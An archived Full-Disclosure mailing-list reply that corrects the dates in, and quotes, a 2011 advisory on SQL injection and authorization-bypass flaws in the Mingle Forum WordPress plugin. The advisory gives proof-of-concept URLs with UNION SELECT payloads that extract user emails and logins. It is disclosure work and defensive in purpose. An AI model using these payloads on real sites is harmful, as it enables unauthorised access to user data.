lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4D289768.3080907@plumata.com> Date: Sat, 08 Jan 2011 11:57:12 -0500 From: Charles Hooper <chooper@...mata.com> To: Christian Sciberras <uuf6429@...il.com> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: Multiple Vulnerabilities in Mingle Forum (WordPress Plugin) My bad ;) Regard those January dates as 2011 On 1/8/2011 10:37 AM, Christian Sciberras wrote: > Wait, the developer fixed the plugin before he got the initial email? > > 12/17/2010 Initial email sent to plugin maintainer. > ... > 01/01/2010 Received response from plugin maintainer. > > :) > > > > > > On Sat, Jan 8, 2011 at 4:21 PM, Charles Hooper <chooper@...mata.com> wrote: > > > 1. Advisory Information > > Title: Multiple Vulnerabilities in Mingle Forum (WordPress Plugin) > Advisory URL: http://www.charleshooper.net/advisories/ > Date Published: January 8th, 2011 > Vendors Contacted: Paul Carter - Maintainer of plugin. > > > 2. Summary > > Mingle Forum is a plugin for the popular blog tool and publishing > platform, WordPress. According to the author of Mingle Forum, "Mingle > Forum has been modified to be lightweight, solid, secure, quick to > setup, [and] easy to use." > > There exist multiple vulnerabilities in Mingle Forum, SQL injection > being among them. > > > 3. Vulnerability Information > > Packages/Versions Affected: Confirmed on 1.0.24 and 1.0.26 > > 3a. Type: SQL Injection [CWE-89] > 3a. Impact: Read application data. > 3a. Discussion: There is a SQL injection vulnerability present in the > RSS feed generator. By crafting specific URLs an attacker can retrieve > information from the MySQL database. > > 3b. Type: SQL Injection [CWE-89] > 3b. Impact: Read application data. > 3b. Discussion: There is a SQL injection vulnerability present in the > `edit post` functionality. By crafting specific URLs an attacker can > retrieve information from the MySQL database. > > 3c. Type: Auth Bypass via Direct Request [CWE-425] > 3c. Impact: AuthZ is not performed for `edit post` functionality. > 3c. Discussion: By browsing directly to the `edit post` page a user can > view and edit any page. > > > 4. PoC & Technical Description > > 4a. > > http://path.to/wordpress/wp-content/plugins/mingle-forum/feed.php?topic=0%20UNION%20SELECT%201,user_email,3,4,5,user_login,7%20FROM%20wp_users%20%23 > > 4b. > > http://path.to/forums/?mingleforumaction=editpost&t=1.0&id=0%20UNION%20SELECT%201,2,3,4,5,6,7%20%23 > > 4c. http://path.to/forums/?mingleforumaction=editpost&t=1.0&id=<target > post ID> > > > 5. Report Timeline > > 12/17/2010 Initial email sent to plugin maintainer. > 12/22/2010 Confirmation of first email requested. > 12/31/2010 Correct email address obtained. Maintainer contacted again on > this date. > 01/01/2010 Received response from plugin maintainer. > 01/07/2010 Plugin maintainer releases update that addresses these > vulnerabilities. > > 6. References > > 6a. The WordPress Plugin page for Mingle Forum: > http://wordpress.org/extend/plugins/mingle-forum/ > > > 7. Legalese > > This vulnerability report by Charles Hooper < chooper@...mata.com > is > licensed under a Creative Commons Attribution-NonCommercial-ShareAlike > 3.0 Unported License. > > > 8. Signature > > Public Key: Obtainable via pool.sks-keyservers.net >> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ >> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists